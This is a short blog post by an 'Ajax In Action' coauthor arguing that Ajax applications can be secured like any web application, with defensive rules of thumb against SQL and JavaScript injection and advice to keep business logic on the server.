Is Ajax unsecure?

Well with the book promotion of Ajax In Action at JavaRanch, the question that kept popping up was: "What about security?" Well the truth is yes some Ajax applications are very open to attack. The reason: Way too much business logic on the server and poorly implemented design on the server.

When we are looking at any web application we do a few things. We test for where the data is coming from. We look for SQL Injections. We look for JavaScript Injections if we are reposting this data.

Now we need to follow these same tests with Ajax. We are still dealing with posting data to the server, which the server business logic handles. We should ALWAYS handle the business logic ON THE SERVER. I need to stress this since this is the only way you can secure your application. Let the server handle building the queries or determining the stored procedures. Some applications out there open this up on the client and you are looking for trouble. Give the hacker your column names and table names. Not a good thing!

An article that people may like is on MSDN: http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/default.aspx?side=true#a. It gives a quick overview on how a person can go about SQL Injection. With JavaScript injection you need to look at all of the event handlers, JavaScript keyword, script tag, and so on. If you are allowing public comments or such, this can cause some trouble. Read the story about Sammy on myspace here: http://www.ajaxian.com/archives/2005/10/sammy_uses_ajax.html. With a little JavaScript, it caused a big problem for myspace.

If you think that Ajax is unsecure and your classic post back forms are, think again. Anyone can easily change a form submission on a normal framework and cause havoc. I have written about it in the past on my blog: http://radio.javaranch.com/pascarello/2004/04/28/1083160143000.html. After looking at those links on the post, you can see that any application is vulnerable to attack.

Eric's Rules of Thumb for Ajax Security:

1. If you use user authentication, make sure you check for it on the request page!
2. Check for SQL Injections
3. Check for JavaScript Injections
4. Keep the Business Logic on the server!
5. Don't assume every request is real!
6. Check the data with validation!
7. Look at the request’s header information and make sure it is correct

Having common sense when programming an Ajax application will keep you and your data safe.

Eric Pascarello
Coauthor of Ajax In Action
Author of: JavaScript: Your Visual Blueprint for Dynamic Web Pages
Moderator of HTML/JavaScript at www.JavaRanch.com